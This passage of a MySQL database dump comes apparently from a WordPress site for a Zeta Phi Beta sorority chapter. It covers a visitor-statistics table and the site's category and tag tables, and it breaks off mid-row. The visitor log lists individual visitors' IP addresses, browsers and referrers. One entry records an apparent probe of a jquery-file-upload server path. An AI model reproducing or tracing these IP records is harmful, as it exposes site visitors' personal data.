,0),(34558,'2018-08-10','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(34559,'2018-08-10','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(34560,'2018-08-10','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.54','000',1,0),(34561,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.251.116','000',2,0),(34562,'2018-08-10','http://zphiblgz.org/','Safari','Linux','534.34','','35.196.251.116','000',1,0),(34563,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.160.76','000',2,0),(34564,'2018-08-10','http://zphiblgz.org/','Safari','Linux','534.34','','35.196.160.76','000',1,0),(34565,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.31.125','000',2,0),(34566,'2018-08-10','https://zphiblgz.org','Safari','iPhone','5.0.2','','35.231.31.125','000',3,0),(34567,'2018-08-10','https://zphiblgz.org','AppleWebKit','Windows','5.47','','34.210.250.80','000',1,0),(34568,'2018-08-10','https://zphiblgz.org','Safari','Linux','6.23.8','','34.210.250.80','000',2,0),(34569,'2018-08-10','https://zphiblgz.org','Firefox','Windows','6.16','','34.210.250.80','000',2,0),(34570,'2018-08-10','http://zphiblgz.org/appa/','MSIE','Windows','6.0','','79.110.28.47','000',4,0),(34571,'2018-08-10','https://www.google.com/','SamsungBrowser','Android','7.2','','99.203.31.81','000',4,0),(34572,'2018-08-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(34573,'2018-08-10','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(34574,'2018-08-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(34575,'2018-08-10','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.28','000',1,0),(34576,'2018-08-10','https://www.google.com/','Chrome','Windows','68.0.3440.84','','66.25.220.233','000',2,0),(34577,'2018-08-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(34578,'2018-08-10','zphiblgz.org','Opera','Windows','12.14','','185.25.48.40','000',1,0),(34579,'2018-08-10','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.135','000',1,0),(34580,'2018-08-10','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','96.127.158.234','000',1,0),(34581,'2018-08-10','https://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','96.127.158.238','000',1,0),(34582,'2018-08-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.250.206.56','000',1,0),(34583,'2018-08-10','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(34584,'2018-08-10','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(34585,'2018-08-10','https://zphiblgz.org','Firefox','Windows','52.0','','213.196.39.19','000',3,0),(34586,'2018-08-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','188.42.195.140','000',1,0),(34587,'2018-08-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','213.196.39.19','000',1,0),(34588,'2018-08-10','https://zphiblgz.org','MSIE','Windows','11.0','','213.196.39.19','000',1,0),(34589,'2018-08-10','https://zphiblgz.org','MSIE','Windows','11.0','','23.105.225.104','000',1,0),(34590,'2018-08-10','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','91.219.237.244','000',2,0),(34591,'2018-08-10','https://zphiblgz.org','Firefox','Windows','52.0','','188.42.216.214','000',1,0),(34592,'2018-08-10','https://zphiblgz.org','Firefox','Windows','41.0','','67.132.206.254','000',1,0),(34593,'2018-08-10','https://www.google.com/','Safari','iPhone','11.0','','209.156.83.8','000',2,0),(34594,'2018-08-10','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.101','000',2,0),(34595,'2018-08-10','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(34596,'2018-08-10','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','206.180.165.147','000',2,0),(34597,'2018-08-10','http://zphiblgz.org/assets/super_admin/vendor/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(34598,'2018-08-10','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','5.135.173.239','000',2,0),(34599,'2018-08-11','http://site.ru','Chrome','Windows','5.0.375.99','','62.129.216.158','000',1,0),(34600,'2018-08-11','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',1,0),(34601,'2018-08-11','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',2,0),(34602,'2018-08-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34603,'2018-08-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',2,0),(34604,'2018-08-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(34605,'2018-08-11','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(34606,'2018-08-11','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.139','000',1,0),(34607,'2018-08-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(34608,'2018-08-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(34609,'2018-08-11','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(34610,'2018-08-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(34611,'2018-08-11','https://zphiblgz.org','Chrome','Unknown','20180811','','34.218.57.59','000',3,0),(34612,'2018-08-11','https://zphiblgz.org','Firefox','Linux','14.49','','34.218.57.59','000',2,0),(34613,'2018-08-11','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(34614,'2018-08-11','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(34615,'2018-08-11','http://www.bing.com/search?q=graduate+chapters+of+zeta+phi+beta+in+maryland&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','23.101.169.3','000',10,0),(34616,'2018-08-11','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(34617,'2018-08-11','https://zphiblgz.org','Firefox','Linux','59.0','','52.173.241.248','000',1,0),(34618,'2018-08-11','https://www.google.com/','Safari','iPhone','11.0','','100.36.67.239','000',2,0),(34619,'2018-08-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(34620,'2018-08-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(34621,'2018-08-11','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.35','000',1,0),(34622,'2018-08-11','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.63','000',1,0),(34623,'2018-08-11','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(34624,'2018-08-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(34625,'2018-08-11','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(34626,'2018-08-11','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(34627,'2018-08-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(34628,'2018-08-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(34629,'2018-08-11','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.34','000',2,0),(34630,'2018-08-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(34631,'2018-08-11','https://zphiblgz.org','MSIE','Windows','11.0','','47.157.250.196','000',3,0),(34632,'2018-08-11','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','42.236.10.75','000',1,0),(34633,'2018-08-11','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','42.236.10.84','000',1,0),(34634,'2018-08-11','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','180.163.220.60','000',1,0),(34635,'2018-08-11','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','180.163.220.62','000',1,0),(34636,'2018-08-11','https://zphiblgz.org','curl','Unknown','7.29.0','','109.238.126.214','000',1,0),(34637,'2018-08-11','https://zphiblgz.org','curl','Unknown','7.29.0','','93.39.201.69','000',1,0),(34638,'2018-08-11','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(34639,'2018-08-11','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(34640,'2018-08-11','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(34641,'2018-08-11','https://zphiblgz.org','Firefox','Windows','49.0','','200.110.156.185','000',2,0),(34642,'2018-08-11','https://www.google.com/','Safari','iPhone','11.0','','73.182.29.85','000',2,0),(34643,'2018-08-11','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.139','000',1,0),(34644,'2018-08-11','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.183.90','000',2,0),(34645,'2018-08-12','https://zphiblgz.org','Edge','Windows','16.16299','','52.173.241.248','000',1,0),(34646,'2018-08-12','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','52.70.48.63','000',2,0),(34647,'2018-08-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.184.47.73','000',4,0),(34648,'2018-08-12','https://zphiblgz.org','Firefox','Windows','52.0','','47.106.117.179','000',2,0),(34649,'2018-08-12','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(34650,'2018-08-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(34651,'2018-08-12','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','174.192.16.50','000',3,0),(34652,'2018-08-12','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(34653,'2018-08-12','https://zphiblgz.org','Chrome','Windows','28.0.1500.95','','35.173.232.48','000',2,0),(34654,'2018-08-12','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(34655,'2018-08-12','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(34656,'2018-08-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(34657,'2018-08-12','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(34658,'2018-08-12','http://site.ru','Chrome','Windows','5.0.375.99','','23.226.70.130','000',1,0),(34659,'2018-08-12','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(34660,'2018-08-12','http://zphiblgz.org/','MSIE','Windows','6.0','','46.151.150.221','000',2,0),(34661,'2018-08-12','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','78.46.94.83','000',1,0),(34662,'2018-08-12','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','78.46.156.169','000',2,0),(34663,'2018-08-12','https://www.google.com/','Safari','iPhone','11.0','','73.213.10.70','000',2,0),(34664,'2018-08-12','https://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.52','000',2,0),(34665,'2018-08-12','https://zphiblgz.org','AppleWebKit','Windows','4.11','','34.214.109.24','000',1,0),(34666,'2018-08-12','https://zphiblgz.org','MSIE','Windows','6.0','','34.214.109.24','000',2,0),(34667,'2018-08-12','http://site.ru','Chrome','Windows','5.0.375.99','','43.254.219.3','000',2,0),(34668,'2018-08-12','https://zphiblgz.org','Firefox','Windows','40.1','','5.193.12.189','000',2,0),(34669,'2018-08-12','https://zphiblgz.org','Chrome','Windows','68.0.3440.106','','182.74.23.22','000',13,0),(34670,'2018-08-12','https://zphiblgz.org','MSIE','Unknown','9.0','','34.210.250.80','000',1,0),(34671,'2018-08-12','https://zphiblgz.org','Firefox','Windows','61.0','','182.74.23.22','000',7,0),(34672,'2018-08-12','https://zphiblgz.org','Edge','Windows','12.246','','52.10.241.82','000',1,0),(34673,'2018-08-12','https://zphiblgz.org','Firefox','Linux','15.0.1','','52.10.241.82','000',2,0),(34674,'2018-08-12','https://zphiblgz.org','Chrome','Android','52.0.2743.98','','52.10.241.82','000',1,0),(34675,'2018-08-12','https://zphiblgz.org','Safari','Macintosh','9.0.2','','52.10.241.82','000',1,0),(34676,'2018-08-12','https://zphiblgz.org','Firefox','Windows','40.1','','106.154.51.178','000',2,0),(34677,'2018-08-12','http://site.ru','Chrome','Windows','5.0.375.99','','50.63.12.201','000',1,0),(34678,'2018-08-12','https://zphiblgz.org','Firefox','Linux','57.0','','182.74.23.22','000',3,0),(34679,'2018-08-12','http://sucuri.net','MSIE','Windows','8.0','','173.255.233.124','000',7,0),(34680,'2018-08-12','https://zphiblgz.org','Safari','Linux','7.10','','35.177.128.24','000',1,0),(34681,'2018-08-12','https://zphiblgz.org','Chrome','Linux','23.13.4','','35.177.128.24','000',1,0),(34682,'2018-08-12','https://zphiblgz.org','Firefox','Windows','9.16','','35.177.128.24','000',1,0),(34683,'2018-08-12','https://zphiblgz.org','Firefox','Windows','3.9.4','','35.177.128.24','000',1,0),(34684,'2018-08-12','https://zphiblgz.org','MSIE','Windows','7.0','','35.177.128.24','000',1,0),(34685,'2018-08-12','https://zphiblgz.org','Chrome','Unknown','15.18.9','','35.177.128.24','000',1,0),(34686,'2018-08-12','https://zphiblgz.org','Safari','Windows','20180812','','35.177.128.24','000',1,0),(34687,'2018-08-12','https://zphiblgz.org','Chrome','Windows','10.9.2','','35.177.128.24','000',1,0),(34688,'2018-08-12','https://zphiblgz.org','Firefox','Windows','19.11','','35.177.128.24','000',1,0),(34689,'2018-08-12','https://zphiblgz.org','Chrome','Linux','3.14','','35.177.128.24','000',1,0),(34690,'2018-08-12','https://zphiblgz.org','AppleWebKit','Linux','20180812','','35.177.128.24','000',1,0),(34691,'2018-08-12','https://zphiblgz.org','AppleWebKit','Windows','20180812','','35.177.128.24','000',1,0),(34692,'2018-08-12','https://zphiblgz.org','Ipad','Unknown','Unknown','','172.185.105.119','000',1,0),(34693,'2018-08-12','https://zphiblgz.org','Safari','iPhone','4.0','','173.255.233.124','000',1,0),(34694,'2018-08-12','https://zphiblgz.org','AppleWebkit','Android','534.30','','173.255.233.124','000',1,0),(34695,'2018-08-12','http://www.facebook.com/','Chrome','Windows','17.0.963.79','','173.255.233.124','000',1,0),(34696,'2018-08-12','74.220.219.51','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(34697,'2018-08-12','https://zphiblgz.org','Firefox','Linux','58.0','','182.74.23.22','000',6,0),(34698,'2018-08-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','67.205.29.157','000',1,0),(34699,'2018-08-12','https://zphiblgz.org','Firefox','Linux','61.0','','182.74.23.22','000',3,0),(34700,'2018-08-12','https://zphiblgz.org/','Edge','Windows','16.16299','','77.121.150.205','000',1,0),(34701,'2018-08-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.72.238.241','000',1,0),(34702,'2018-08-12','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','185.104.184.126','000',2,0),(34703,'2018-08-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(34704,'2018-08-12','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(34705,'2018-08-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',2,0),(34706,'2018-08-12','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(34707,'2018-08-12','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.25','000',1,0),(34708,'2018-08-12','https://zphiblgz.org/','Firefox','Windows','38.0','','185.104.184.126','000',2,0),(34709,'2018-08-12','https://zphiblgz.org','Chrome','Linux','55.0.2883.87','','54.152.54.190','000',2,0),(34710,'2018-08-12','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(34711,'2018-08-12','http://site.ru','Chrome','Windows','5.0.375.99','','208.113.153.217','000',1,0),(34712,'2018-08-12','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(34713,'2018-08-12','https://www.google.com/','Safari','iPhone','11.0','','69.255.155.151','000',2,0),(34714,'2018-08-12','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.195.85','000',1,0),(34715,'2018-08-12','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(34716,'2018-08-12','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(34717,'2018-08-12','http://zphiblgz.org/','Safari','Macintosh','10.1.1','','163.172.4.153','000',1,0),(34718,'2018-08-12','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(34719,'2018-08-12','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.244','000',1,0),(34720,'2018-08-12','https://www.google.com/','Chrome','Macintosh','67.0.3396.99','','75.51.235.119','000',5,0),(34721,'2018-08-12','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.129.35','000',2,0),(34722,'2018-08-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(34723,'2018-08-13','https://zphiblgz.org','Chrome','Chrome OS','67.0.3396.99','','69.143.127.21','000',3,0);
/*!40000 ALTER TABLE `lwz_statistics_visitor` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_term_relationships`
--

DROP TABLE IF EXISTS `lwz_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_term_relationships`
--

LOCK TABLES `lwz_term_relationships` WRITE;
/*!40000 ALTER TABLE `lwz_term_relationships` DISABLE KEYS */;
INSERT INTO `lwz_term_relationships` VALUES (956,2,0),(59,50,0),(90,4,0),(90,8,0),(90,10,0),(90,13,0),(90,22,0),(991,61,0),(989,59,0),(559,1,0),(557,1,0),(555,1,0),(553,1,0),(551,1,0),(549,1,0),(547,1,0),(493,51,0),(59,13,0),(531,35,0),(59,8,0),(59,41,0),(59,42,0),(952,49,0),(1298,55,0),(1298,41,0),(1298,83,0),(1298,84,0),(1298,85,0),(1309,41,0),(1309,84,0),(1309,86,0),(1309,13,0),(1309,87,0),(1309,55,0),(90,41,0),(90,56,0),(90,57,0),(90,42,0),(949,49,0),(1141,49,0),(951,49,0),(1431,57,0),(1023,63,0),(1023,42,0),(1023,68,0),(90,63,0),(90,68,0),(1143,49,0),(1142,49,0),(1144,49,0),(1214,35,0),(1318,49,0),(1321,49,0),(1431,107,0),(1243,2,0),(1287,49,0),(1331,44,0),(1331,70,0),(1344,23,0),(1344,88,0),(1344,89,0),(1344,90,0),(1344,91,0),(1344,92,0),(1344,93,0),(1344,94,0),(1344,95,0),(1338,96,0),(1338,56,0),(1338,97,0),(1338,98,0),(1338,99,0),(1338,65,0),(1338,100,0),(1431,110,0),(1431,109,0),(1431,108,0),(1431,111,0),(1390,43,0);
/*!40000 ALTER TABLE `lwz_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_term_taxonomy`
--

DROP TABLE IF EXISTS `lwz_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=112 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_term_taxonomy`
--

LOCK TABLES `lwz_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `lwz_term_taxonomy` DISABLE KEYS */;
INSERT INTO `lwz_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'category','',0,2),(3,3,'category','',0,0),(4,4,'post_tag','',0,1),(5,5,'post_tag','',0,0),(6,6,'post_tag','',0,0),(7,7,'post_tag','',0,0),(8,8,'post_tag','',0,2),(9,9,'post_tag','',0,0),(10,10,'post_tag','',0,1),(11,11,'post_tag','',0,0),(12,12,'post_tag','',0,0),(13,13,'post_tag','',0,2),(14,14,'post_tag','',0,0),(15,15,'post_tag','',0,0),(16,16,'post_tag','',0,0),(17,17,'post_tag','',0,0),(18,18,'post_tag','',0,0),(19,19,'post_tag','',0,0),(20,20,'post_tag','',0,0),(21,21,'post_tag','',0,0),(22,22,'post_tag','',0,1),(23,23,'event_categories','',0,1),(24,24,'cause_categories','',0,0),(26,26,'videos_categories','',0,0),(27,27,'portfolio_register_post_type','',0,0),(28,28,'cause_categories','',0,0),(29,29,'sermon_categories','',0,0),(30,30,'sermon_categories','',0,0),(32,32,'post_format','',0,0),(33,33,'post_format','',0,0),(34,34,'post_format','',0,0),(35,35,'product_type','',0,1),(36,36,'product_type','',0,0),(37,37,'product_type','',0,0),(38,38,'product_type','',0,0),(41,41,'post_tag','',0,2),(42,42,'post_tag','',0,3),(43,43,'event_categories','',0,1),(44,44,'event_categories','',0,1),(45,45,'teams','',0,0),(46,46,'teams','Lambda Gamma Zeta Chapter Members. ',0,0),(49,49,'nav_menu','',0,10),(48,48,'category','',0,0),(50,50,'cause_categories','',0,1),(51,51,'event_categories','',0,1),(52,52,'event_categories','',0,0),(53,53,'event_categories','',0,0),(54,54,'event_categories','',0,0),(55,55,'event_categories','',0,2),(56,56,'post_tag','',0,1),(57,57,'post_tag','',0,2),(59,59,'wpdmcategory','',0,1),(60,60,'wpdmcategory','',0,0),(61,61,'wpdmcategory','',62,1),(62,62,'wpdmcategory','',0,0),(63,63,'post_tag','',0,2),(64,64,'post_tag','',0,0),(65,65,'post_tag','',0,0),(66,66,'post_tag','',0,0),(67,67,'event_categories','',0,0),(68,68,'cause_categories','',0,2),(69,69,'event_categories','',0,0),(70,70,'event_categories','',44,1),(71,71,'product_visibility','',0,0),(72,72,'product_visibility','',0,0),(73,73,'product_visibility','',0,0),(74,74,'product_visibility','',0,0),(75,75,'product_visibility','',0,0),(76,76,'product_visibility','',0,0),(77,77,'product_visibility','',0,0),(78,78,'product_visibility','',0,0),(79,79,'product_visibility','',0,0),(80,80,'teams','',0,0),(81,81,'post_tag','',0,0),(82,82,'product_cat','',0,0),(83,83,'post_tag','',0,0),(84,84,'post_tag','',0,0),(85,85,'post_tag','',0,0),(86,86,'post_tag','',0,0),(87,87,'post_tag','',0,0),(88,88,'post_tag','',0,0),(89,89,'post_tag','',0,0),(90,90,'post_tag','',0,0),(91,91,'post_tag','',0,0),(92,92,'post_tag','',0,0),(93,93,'post_tag','',0,0),(94,94,'post_tag','',0,0),(95,95,'post_tag','',0,0),(96,96,'post_tag','',0,0),(97,97,'post_tag','',0,0),(98,98,'post_tag','',0,0),(99,99,'post_tag','',0,0),(100,100,'post_tag','',0,0),(101,101,'post_tag','',0,0),(102,102,'post_tag','',0,0),(103,103,'post_tag','',0,0),(104,104,'post_tag','',0,0),(107,107,'post_tag','',0,1),(105,105,'post_tag','',0,0),(106,106,'post_tag','',0,0),(108,108,'post_tag','',0,1),(109,109,'post_tag','',0,1),(110,110,'post_tag','',0,1),(111,111,'post_tag','',0,1);
/*!40000 ALTER TABLE `lwz_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_termmeta`
--

DROP TABLE IF EXISTS `lwz_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_termmeta`
--

LOCK TABLES `lwz_termmeta` WRITE;
/*!40000 ALTER TABLE `lwz_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_terms`
--

DROP TABLE IF EXISTS `lwz_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=112 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_terms`
--

LOCK TABLES `lwz_terms` WRITE;
/*!40000 ALTER TABLE `lwz_terms` DISABLE KEYS */;
INSERT INTO `lwz_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'News','news',0),(3,'Stories','stories',0),(4,'cause','cause',0),(5,'custom','custom',0),(6,'custom post','custom-post',0),(7,'demonstration','demonstration-2',0),(8,'donate','donate',0),(9,'event tag','event-tag',0),(10,'help','help',0),(11,'hopeful','hopeful',0),(12,'Mathew','mathew',0),(13,'money','money',0),(14,'posts','posts',0),(15,'sermon','sermon',0),(16,'simple','simple',0),(17,'story','story',0),(18,'tag','tag',0),(19,'theme','theme',0),(20,'touchsize','touchsize',0),(21,'video','video',0),(22,'wordpress','wordpress',0),(23,'Charity events','charity-events',0),(24,'Church','church',0),(26,'Demonstration','demonstration',0),(27,'Happy','happy',0),(28,'Social','social',0),(29,'Weekdays','weekdays',0),(30,'Weekends','weekends',0),(32,'Video','post-format-video',0),(33,'Gallery','post-format-gallery',0),(34,'Audio','post-format-audio',0),(35,'simple','simple',0),(36,'grouped','grouped',0),(37,'variable','variable',0),(38,'external','external',0),(41,'scholarship','scholarship',0),(42,'Zeta Phi Beta','zeta-phi-beta',0),(43,'Youth','youth',0),(44,'Community Service','community-service',0),(45,'Executive Board','executive-board',0),(46,'Chapter Members','members',0),(49,'Main Menu 1','main-menu-1',0),(48,'Members Only','members-only',0),(50,'Scholarship','scholarship',0),(51,'BOG','bog',0),(52,'APPA','appa',0),(53,'DP','dp',0),(54,'ZEN','zen',0),(55,'Scholarship','scholarship',0),(56,'Howard County','howard-county',0),(57,'Zeta','zeta',0),(59,'Chapter Documents','chapter-documents',0),(60,'Chapter Constitution &amp; By-Laws','chapter-constitution-by-laws',0),(61,'January 2017 Chapter Reports','january-2017-chapter-reports',0),(62,'2017 Chapter Meeting Reports','2017-chapter-meeting-reports',0),(63,'March of Dimes','march-of-dimes',0),(64,'Walk','walk',0),(65,'Fundraiser','fundraiser',0),(66,'Premature','premature',0),(67,'Sisterhood','sisterhood',0),(68,'March of Dimes','march-of-dimes',0),(69,'Membership','membership',0),(70,'Community Event','community-event',0),(71,'exclude-from-search','exclude-from-search',0),(72,'exclude-from-catalog','exclude-from-catalog',0),(73,'featured','featured',0),(74,'outofstock','outofstock',0),(75,'rated-1','rated-1',0),(76,'rated-2','rated-2',0),(77,'rated-3','rated-3',0),(78,'rated-4','rated-4',0),(79,'rated-5','rated-5',0),(80,'2017 Ruth Conway Scholarship Recipients','2017-ruth-conway-scholarship-recipients',0),(81,'MD','md',0),(82,'Uncategorized','uncategorized',0),(83,'Workshop','workshop',0),(84,'College','college',0),(85,'Applications','applications',0),(86,'financial aid','financial-aid',0),(87,'college application','college-application',0),(88,'giving','giving',0),(89,'joy','joy',0),(90,'food drive','food-drive',0),(91,'community','community',0),(92,'joy drive','joy-drive',0),(93,'thanksgiving','thanksgiving',0),(94,'christmas','christmas',0),(95,'holiday','holiday',0),(96,'hope','hope',0),(97,'domestic 